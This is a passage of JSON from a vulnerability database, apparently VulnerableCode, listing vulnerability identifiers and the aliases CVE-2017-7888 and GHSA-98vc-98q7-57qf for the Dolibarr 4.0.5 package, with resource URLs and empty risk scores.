bility":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@4.0.5"}],"aliases":["CVE-2017-7888","GHSA-98vc-98q7-57qf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vss8-eqj1-kkcm"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@4.0.5"}